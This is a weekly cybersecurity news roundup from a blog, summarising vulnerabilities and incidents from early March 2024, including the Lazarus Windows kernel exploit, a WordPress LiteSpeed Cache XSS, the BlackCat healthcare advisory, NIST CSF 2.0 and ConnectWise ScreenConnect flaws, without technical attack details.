Welcome to TheCyberThrone cybersecurity week in review will be posted covering the important security happenings. This review is for the week ending Saturday, March 2nd, 2024
Lazarus Group Exploits Windows Kernel Vulnerability -CVE-2024-21338
Avast has uncovered details surrounding a zero-day exploit actively used by the Lazarus Group, targeting a vulnerability in the Windows appid.sys driver. This kernel-level vulnerability allowed attackers to deploy an advanced, stealthy rootkit, named “FudModule.”
This vulnerability, hidden within the depths of the `appid.sys` AppLocker driver and tracked as CVE-2024-21338 with a CVSS score of 7.8, emerged as a Windows Kernel Elevation of Privilege Vulnerability. The exploit required an attacker to have initial access to the system, from where they could launch a specially designed application to leverage this vulnerability, aiming to gain SYSTEM privileges.
WordPress LiteSpeed Cache Plugin Vulnerability – CVE-2023-40000
A Cross-Site Scripting (XSS) vulnerability was recently discovered in the WordPress plugin LiteSpeed Cache. With over 5 million active installations, this plugin is a popular choice for website performance optimization. The vulnerability could have allowed unauthenticated attackers to inject malicious code into vulnerable websites, opening the door for sensitive data theft, defacement, and privilege escalation.
The vulnerability tracked as CVE-2023-40000 that as a CVSS score of 8.3, is a flaw existed due to insufficient input sanitization and output escaping within the update_cdn_status function. This, in combination with improper access controls on a REST API endpoint, created the potential for exploitation.
BlackCat ransomware retaliation advisory notice from US authorities
The ALPHV/BlackCat ransomware gang is targeting the healthcare sector following its threats to retaliate against law enforcement interference, according to a joint advisory by the FBI, CISA and HHS released Tuesday.
The group claimed responsibility for a recent attack on Change Healthcare, saying it stole 6TB of data, the information reportedly stolen includes Change Healthcare solution source codes and data on thousands of healthcare providers, pharmacies and insurance providers.
SUBSCRIBE TO OUR BLOG TODAY !
We understand the importance of staying on top of the latest threats and vulnerabilities that can harm your digital life. You’ll receive the latest cybersecurity news, insights, resources, offers and analysis straight to your inbox every day
NIST Releases Cybersecurity framework 2.0
The National Institute for Standards and Technology (NIST) has released its Cybersecurity Framework 2.0. The draft was released last year. NIST released its first CSF in 2014, at the direction of a presidential executive order to help organizations, specifically critical infrastructure, mitigate cybersecurity risk.
This framework builds on its long-standing cyber risk reducing recommendations to include the concerns of organizations outside of its initial focus on critical infrastructure.
ConnectWise Critical Vulnerability CVE-2024-1709
ConnectWise, a prevalent provider of remote desktop software, disclosed severe security flaws within their ScreenConnect product. These flaws pose an immediate danger, with active exploitation already observed.
CVE-2024-1708 with a CVSS Score 8.4 is a path-traversal vulnerability enabling attackers to execute malicious code or steal sensitive data. Any ScreenConnect version before 23.9.7 is at risk.
CVE-2024-1709 with a CVSS Score 10 is an authentication bypass that offers attackers unhindered backdoor entry to critical systems and information. Again, versions before 23.9.7 are impacted. A working PoC is available for exploitation
This brings end of this week in review security coverage. Thanks for visiting TheCyberThrone. If you like us please follow us on Facebook, Twitter, Instagram
